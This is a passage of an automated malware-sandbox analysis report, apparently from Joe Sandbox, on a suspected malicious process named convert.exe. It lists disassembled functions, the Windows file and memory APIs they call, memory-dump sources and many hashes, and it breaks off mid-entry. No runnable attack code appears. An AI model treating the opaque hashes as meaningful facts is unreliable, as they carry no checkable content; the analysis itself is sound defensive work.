Instruction Fuzzy Hash: 4C313172E002197FEF54DB648C45FEFB2BAEF45704F004599A549A6140EE746B888FA2

Function 02D54F67 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

, xrefs: 02D54F91
k, xrefs: 02D54F9F
o, xrefs: 02D54F98
e, xrefs: 02D54FA6

Memory Dump Source

Source File: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b00000_nBalytGzlKEsLGhTwrqyRTGQJtkGfn.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 8591ad48f950d380e9b4aafef3a2a736083236507383ab723d586de5ea0dd399
Instruction ID: cb0f5f8454af6e752708c6d49b74547f58f77aecd438e133fc99baebd90ba552
Opcode Fuzzy Hash: 8591ad48f950d380e9b4aafef3a2a736083236507383ab723d586de5ea0dd399
Instruction Fuzzy Hash: 3F01A1B2900218ABDB14DF98D884ADEF7BAFF48314F048609E909AB201E771D945CBB0

Function 02D54F6A Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

, xrefs: 02D54F91
k, xrefs: 02D54F9F
o, xrefs: 02D54F98
e, xrefs: 02D54FA6

Memory Dump Source

Source File: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b00000_nBalytGzlKEsLGhTwrqyRTGQJtkGfn.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: ded07cf675271579ef6f0d03d869636f66cd9f43533ac698345593456a5a8594
Instruction ID: e3f6dfbd9374e6d0e6baa7247b3adef751a4f2e1f8226aa039fa6c239502ba10
Opcode Fuzzy Hash: ded07cf675271579ef6f0d03d869636f66cd9f43533ac698345593456a5a8594
Instruction Fuzzy Hash: 2B0184B290021CAFDB14DF98D884ADEF7BAFF48714F048659E9195B201E771A945CFB0

Function 02D4178A Relevance: 5.0, Strings: 4, Instructions: 23COMMON

Download Yara Rule

Strings

r8tygp, xrefs: 02D417BB, 02D417C4
I, xrefs: 02D417B0
gp, xrefs: 02D417A7
r8ty, xrefs: 02D417A0

Memory Dump Source

Source File: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b00000_nBalytGzlKEsLGhTwrqyRTGQJtkGfn.jbxd

Yara matches

Similarity

API ID:
String ID: I$gp$r8ty$r8tygp
API String ID: 0-3210988208
Opcode ID: 1af5f7d1b115ab465ff070ff6d6fc9ed4e2303a4149dceb28597bbcd2f556265
Instruction ID: 4b97c5901c6dffcea3d5085f1b8e75103a32066cb66fc215df0b660545b06bfa
Opcode Fuzzy Hash: 1af5f7d1b115ab465ff070ff6d6fc9ed4e2303a4149dceb28597bbcd2f556265
Instruction Fuzzy Hash: 1BE09B74C0024C6AD704DFE4CC015AEBB75EF10244F205A99D5589B341E771CA44C795

Analysis Process: convert.exePID: 7644, Parent PID: 892COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	1.6%
Total number of Nodes:	436
Total number of Limit Nodes:	70

Executed Functions

Function 0301BB30 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0301BC0F
FindNextFileW.KERNELBASE(?,00000010), ref: 0301BC4E
FindClose.KERNELBASE(?), ref: 0301BC59

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: aec998e13f77c624d27fbae22879e302afd8c550c0356b66cd8810031771a93a
Instruction ID: 81698ac2322c66914273ca194e164edb391990a4bcf3b68c58bef21dd171dfe2
Opcode Fuzzy Hash: aec998e13f77c624d27fbae22879e302afd8c550c0356b66cd8810031771a93a
Instruction Fuzzy Hash: 7A315475A41318BBDB60DF60CC85FFF77BCAF84704F144598B908AB180DB70AA948BA1

Function 030279F0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03027AE3

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4e5a1b31b6d9fc48fc2964c052a7a645412d5f56aafd950f7fead80f54c7686
Instruction ID: 26eb765bc34c51bb346cb87abd06f75f9a30e686d229f9f7af3cd8bf604ad645
Opcode Fuzzy Hash: e4e5a1b31b6d9fc48fc2964c052a7a645412d5f56aafd950f7fead80f54c7686
Instruction Fuzzy Hash: 4431D8B5A01209AFDB14DF98D880EDEBBF9EF8C714F108219F918A7340D770A951CBA5

Function 03027B50 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03027C2E

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e46d9957c0db2f6c59e2789071fe23fe188d54b9168cb2eac15009d3e1776e43
Instruction ID: 6c7b5728756185ff526c4aec8a77b5731c85fe32e4ed4bce759cdcd7c2bf8d8d
Opcode Fuzzy Hash: e46d9957c0db2f6c59e2789071fe23fe188d54b9168cb2eac15009d3e1776e43
Instruction Fuzzy Hash: BC31E8B5A01209AFDB14DF99D880EEE77F9EF88714F108219FD18A7240D770A8118BA5

Function 03027E40 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0301174B,?,03026A67,00000000,00000004,00003000,?,?,?,?,?,03026A67,0301174B,03026A67,8DE68A6A,0301174B), ref: 03027F00

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1c5e579a0c534929bf84c18d61e2c12f9156a2c50f4d83587a10b9dd1a5faa77
Instruction ID: 3067b87772342f262344f1a3cd6d89727c8464f9db2497e28107cf490ba2978b
Opcode Fuzzy Hash: 1c5e579a0c534929bf84c18d61e2c12f9156a2c50f4d83587a10b9dd1a5faa77
Instruction Fuzzy Hash: 48214F79A01219ABDB14DF58DC41EEF77BDEF88710F504619FD18A7280D770A811CBA1

Function 03027C40 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 03027CCB

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: eeed07b1f05f2d661215479f502ef8e1267d9358bf8fd1a99d9a0f55f621d0f9
Instruction ID: bb461e9a90a008967c64bf07905c8030ccca1c3ea7f6a3cd4bdbce40efbba030
Opcode Fuzzy Hash: eeed07b1f05f2d661215479f502ef8e1267d9358bf8fd1a99d9a0f55f621d0f9
Instruction Fuzzy Hash: 9501A13AA423187BE720EAA4DC41FEB77ACEFC4710F404509FA18AB180DBB5790187E5

Function 03027CE0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03027D14

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 71f2d4d9845514d85ca477c2236196dd34edef0c8c1c32d0e7ef2a9b942529fc
Instruction ID: 80049c5c093b696cdfdc80d6c54fa069d9fa08b4a4563e0da0ec7cd3633d0f6c
Opcode Fuzzy Hash: 71f2d4d9845514d85ca477c2236196dd34edef0c8c1c32d0e7ef2a9b942529fc
Instruction Fuzzy Hash: D7E0463A6412147BD620EA59DC40FDBBBACEFC5720F418415FA1CAB241C670B9008BB5

Function 03764340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0376434A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa9c34c240626066b18c5aad15cce9dc0030c0543672cda6c9847565a4aff9a8
Instruction ID: 580c4b09d95a7f5ff436e56b7d035f2e5bf2912b4fab452524c333d448c1430e
Opcode Fuzzy Hash: aa9c34c240626066b18c5aad15cce9dc0030c0543672cda6c9847565a4aff9a8
Instruction Fuzzy Hash: 5690023160590422A540B15888C9546400597E0301B56C031E0424564C8B148A565362

Function 03764650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0376465A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c13d409ef4c72c946e9f5cc7b1dfccef57512758a4b3024342b7549ca4bcda9a
Instruction ID: cdea4ec8c92e103d0b900a34df5ebfa86e5624b2f744fa71042988a68fb02953
Opcode Fuzzy Hash: c13d409ef4c72c946e9f5cc7b1dfccef57512758a4b3024342b7549ca4bcda9a
Instruction Fuzzy Hash: E3900261601604525540B1588849406600597E1301396C135A0554570C87188955926A

Function 037635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037635CA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55a686a6cf2b031c2984794058f242544de6fb27118a00fdfec4686f22020ec6
Instruction ID: ad0113e3bfc9ed8a7005891a2fa0ac9a1347a9611b5942baa2de782042e8a52c
Opcode Fuzzy Hash: 55a686a6cf2b031c2984794058f242544de6fb27118a00fdfec4686f22020ec6
Instruction Fuzzy Hash: 1690023160560812E500B1588559706100587D0201F66C431A0424578D87958A5165A3

Function 03762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762B6A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e4b37b900b1652ac1dfa189174ee5bbf8d88b5b43f3817df449293f38d45144
Instruction ID: 7fe4005efe23b0cbbf2b38615a9c7932b95261189a59c89a16250f64fb2deb8e
Opcode Fuzzy Hash: 7e4b37b900b1652ac1dfa189174ee5bbf8d88b5b43f3817df449293f38d45144
Instruction Fuzzy Hash: 3C900261202504135505B1588459616400A87E0201B56C031E10145A0DC62589916126

Function 03762BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762BFA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f9def06aff12cde715d69b8bd130809f040b8133d112128836fd979f9d45ed9
Instruction ID: beda4d1b1b79112217991b99e3c7879b4cb915b52b89509aa646945a07e70d67
Opcode Fuzzy Hash: 4f9def06aff12cde715d69b8bd130809f040b8133d112128836fd979f9d45ed9
Instruction Fuzzy Hash: E090023120150C12E580B158844964A000587D1301F96C035A0025664DCB158B5977A2

Function 03762BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762BEA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78eb3b2f8be0b82f28f90b3c28ccf1123f2df45edcccaa72b591cbfbea6e1098
Instruction ID: 1bfdb4fa0a59c1d0654da44579ece5e5edef312349d2d27d4ecc0cfd7d25f2bd
Opcode Fuzzy Hash: 78eb3b2f8be0b82f28f90b3c28ccf1123f2df45edcccaa72b591cbfbea6e1098
Instruction Fuzzy Hash: 3A90023120554C52E540B1588449A46001587D0305F56C031A00646A4D97258E55B662

Function 03762BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762BAA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29f5f8a5d74877fbac39b9ce37bb94f1dc2c7b421d133a8712a8647cb0f17d37
Instruction ID: 74985619226dad3f4760fc04d8b2699757eac199616a33976c453dc68ee8c4a7
Opcode Fuzzy Hash: 29f5f8a5d74877fbac39b9ce37bb94f1dc2c7b421d133a8712a8647cb0f17d37
Instruction Fuzzy Hash: 4890023160550C12E550B1588459746000587D0301F56C031A0024664D87558B5576A2

Function 03762AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762AFA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f9b19d38a99b7cb82dbff3c588f5111d19d262f1b1cc243df9fed6b8cd230d4
Instruction ID: bf3b941361d07b6cc8a8a8ae21551640bf97a5016d858626bbb6d776a1fb9fb7
Opcode Fuzzy Hash: 3f9b19d38a99b7cb82dbff3c588f5111d19d262f1b1cc243df9fed6b8cd230d4
Instruction Fuzzy Hash: D1900225221504121545F558464950B044597D6351396C035F14165A0CC72189655322

Function 03762AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762ADA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18eeeb853aa98797ba46d2d7dc955d597130f4dafa9b22d11d008f848abcb8c4
Instruction ID: 2d9af749c133278f2d6756d828727516f9c8b09a36ce0a64e7fa30f4a67dd553
Opcode Fuzzy Hash: 18eeeb853aa98797ba46d2d7dc955d597130f4dafa9b22d11d008f848abcb8c4
Instruction Fuzzy Hash: BE900435311504131505F55C474D5070047C7D5351357C031F1015570CD731CD715133

Function 037639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037639BA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfd3266e19935e93d1fead5eeb50893821849609915a0957c576df8536f920d5
Instruction ID: 17b8d07771a1cfaa831405175e637917418de4059d1f9b8c42e4f3d5ebe07c69
Opcode Fuzzy Hash: dfd3266e19935e93d1fead5eeb50893821849609915a0957c576df8536f920d5
Instruction Fuzzy Hash: 2190022124555512E550B15C84496164005A7E0201F56C031A08145A4D865589556222

Function 03762F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762F3A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03658f6f209836582a614f1923ac4554cb8119b0c6930221e70a6f2971f437a5
Instruction ID: 2443a2dc239a5ebaf2571836d669c80ac2cc538e9b6d9f8a2935fbdf3486ae81
Opcode Fuzzy Hash: 03658f6f209836582a614f1923ac4554cb8119b0c6930221e70a6f2971f437a5
Instruction Fuzzy Hash: 8790026134150852E500B1588459B060005C7E1301F56C035E1064564D8719CD526127

Function 03762FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762FEA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a732a64db8b9b3e842bb60a752df6ddf89d708e0b2660a9c3a2e6b67e19d5bc
Instruction ID: 2774c13a55ffc5a693a8fc8327805bfc1ebed0cd8ef12fd113fbb24f4abb2d73
Opcode Fuzzy Hash: 7a732a64db8b9b3e842bb60a752df6ddf89d708e0b2660a9c3a2e6b67e19d5bc
Instruction Fuzzy Hash: 99900221211D0452E600B5688C59B07000587D0303F56C135A0154564CCA1589615522

Function 03762FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762FBA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ae5f615b1a1b2888bc1123a181f6f9a405be468bb1f3bd503032d3d2c23c6c9
Instruction ID: 034f5fd09eda4b3ec01b71d662bcd3c3cf2302f7d8807478d81867a69b576860
Opcode Fuzzy Hash: 4ae5f615b1a1b2888bc1123a181f6f9a405be468bb1f3bd503032d3d2c23c6c9
Instruction Fuzzy Hash: 77900221601504525540B168C8899064005ABE1211756C131A0998560D865989655666

Function 03762EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762EEA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 601f85ff581e33e8ce67ba02a482c4f978d6abcebec87cc658f587ed4e40365f
Instruction ID: eb0a84a88a1437309a3bed2c4f9e0daf03a230f0fd3a576a7336fa74a0105ca0
Opcode Fuzzy Hash: 601f85ff581e33e8ce67ba02a482c4f978d6abcebec87cc658f587ed4e40365f
Instruction Fuzzy Hash: 7290026120190813E540B5588849607000587D0302F56C031A2064565E8B298D516136

Function 03762E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762E8A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f679927036edb42c77186c5173fbfae888df626aa76375dd0713d1be3fa67b2
Instruction ID: a775f7e30883adb6243bfe967640fe7aa83f174bada0bc943a6dfc4023b322bd
Opcode Fuzzy Hash: 3f679927036edb42c77186c5173fbfae888df626aa76375dd0713d1be3fa67b2
Instruction Fuzzy Hash: 0E90022160150912E501B1588449616000A87D0241F96C032A1024565ECB258A92A132

Function 03762D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762D3A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba772ed977acf57e440f9f475d72cac2fab553401d1ad03ec1e608a128c3e431
Instruction ID: 9c8f7115e25d0df0ee7623c83b79196efd10143fe2b0295fc2bb4b8bfb049815
Opcode Fuzzy Hash: ba772ed977acf57e440f9f475d72cac2fab553401d1ad03ec1e608a128c3e431
Instruction Fuzzy Hash: EC90022130150413E540B158945D6064005D7E1301F56D031E0414564CDA1589565223

Function 03762D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762D1A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e999abac142d1bd0dc9209b44cf0adc7f38fe8d0dde26599bf5f033a1d2bb45b
Instruction ID: d47526669b99daabb282337c5a66fe206d54d41fb9aacc6fa0c59edf326708b9
Opcode Fuzzy Hash: e999abac142d1bd0dc9209b44cf0adc7f38fe8d0dde26599bf5f033a1d2bb45b
Instruction Fuzzy Hash: 8190022921350412E580B158944D60A000587D1202F96D435A0015568CCA1589695322

Function 03762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

